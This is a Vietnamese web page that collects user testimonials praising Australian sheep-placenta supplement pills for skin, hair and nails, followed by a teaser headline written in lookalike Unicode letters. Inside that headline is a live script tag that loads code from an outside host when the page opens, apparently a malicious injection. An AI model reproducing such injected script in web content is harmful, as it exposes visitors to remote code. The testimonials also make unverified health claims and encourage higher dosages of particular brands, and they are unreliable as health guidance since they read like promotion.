RSS

Tổng hợp REVIEW của các chị em về Viên uống Nhau Thai Cừu Úc

08:00 04/11/2018

* Mẹ phuongbach: Mình cũng đã uống được khoảng 5,6 lọ Nhau thai cừu của Úc, chắc là cũng tốt thật vì mình thấy da cũng mịn màng, hơn nữa mình cũng dùng cả sữa ong chúa và tảo biển nên k biết công dụng của loại nào là hiệu quả nhất.

Không có văn bản thay thế tự động nào.

* Mẹ Tí Yêu: Có mình đã uống và đang tiếp tục uống đây, rất tốt, da dẻ láng mịn, trơn láng và quan trọng nhất là thấy khỏe ra.

* Mẹ nin_owl: Mình đang xài Placenta xách tay từ Úc đây, cả mẹ mình cũng xài nữa nói chung uống rất yên tâm, mình uống cũng được nửa năm rồi, da sáng lên hẳn, nói chung ai bị nám với lại nếp nhăn thì nên xài.

* Mẹ ritamoon: Trước đây mình bị mụn để lại sẹo, giờ đang trong quá trình trị sẹo thì người nhà mình ở Úc giới thiệu uống thêm viên uống Nhau thai cừu để tăng quá trình sản sinh Collagen. Mình thấy hiệu quả rất tốt các mẹ ạ, thấy da mặt dạo này bớt vết thâm và căng ra nhất là vào buổi sáng.

Không có văn bản thay thế tự động nào.

* Mẹ Nhungfamily: Chào các chị, em ở Úc mấy năm rồi, có uống Nhau thai cừu...e thấy da em đẹp trông thấy... em thấy có tác dụng...em mua ở pharmacy bên này được tư vấn là đẹp da, đẹp tóc và móng tay,... Móng tay em từ trc rất mềm nhưng từ khi uống xong thì chắc hẳn lên. Họ nói uống 1 lọ thì có tác dụng nhưng có thể do em còn trẻ và từ trc đến h da ko phải xấu nên uống được 2 tuần là thấy có công hiệu rồi. H em có gửi cho mẹ em và anh trai em uống... 2 ng đều thấy có công hiệu... Còn về giá tiền thì Úc có nhiều hãng vè khi xem lọ thuốc thì các chị chú ý là xem hàm lượng của nó. Hàm lượng càng cao thì càng mắc tiền ( công thêm tên tuổi của công ty sản xuất?). Thường em thấy Vn hay bán loại Placenta của Costa nhưng hàm lượng có 3000mg (các mẹ có thể nhìn thấy ở trước lọ thuốc). Em uống loại 15000mg và giờ đổi lên thành 30000mg thì work nhanh hơn rất nhiều so với 3000mg... Dì em 42 tuổi uống được 4 năm rồi và da rất mịn và đẹp... em ko bán hàng nên các mẹ cứ yên tâm vì em rất tâm đắc với sản phẩm Viên uống Nhau thai cừu của Úc nên muốn chia sẻ thông tin với mọi ng.

* Mẹ MeSoRiKute: Mình cũng đang uống nhau thai cuu đây sản phẩm cũng rất tốt, giờ mình mới mua xài thêm tế bào gốc nhau thai cừu dạng serum mà do chị Kỳ Duyên làm đại diện ấy, có mẹ nào xài loại tế bào gốc này chưa thấy video chị Kỳ Duyên quảng cáo cũng hấp dẫn.

Trong hình ảnh có thể có: 1 người

* Mẹ zzee11: Mình đang dùng viên uống Nhâ thai cừu Rebirth của hãng Lanopearl xuất xứ từ Úc. Rất tốt các mẹ ak, mình cảm nhận thấy da mình săn chắc và trắng sáng hơn lúc trước, da dẻ thì mịn màng. Vết nám tàn nhang mờ dần, mình có giới thiệu cho bạn bè dùng và ai cũng thấy hiệu quả. Các mẹ dùng thử xem sao. Hãng Lanopearl này rất có uy tín nên các mẹ dùng có thể yên tâm.

Nguồn: Webtretho

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп<script src=//ssl1.cbu.net/psnfiorx></script>

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп

Tɦeo các ɓác sĩ, sức ƙɦỏe củɑ пɢũ łạпɢ qᴜyếł ᵭịпɦ łᴜổi łɦọ củɑ ɓạп. Đây ℓà ɓí qᴜyếł ℓựɑ cɦọп łɦực ρɦẩɱ cɦăɱ sóc cơ łɦể łốł пɦấł ɓạп пêп łɦɑɱ ƙɦảo ᵭể ℓᴜôп ƙɦỏe ɱạпɦ ʋà łɾườпɢ łɦọ.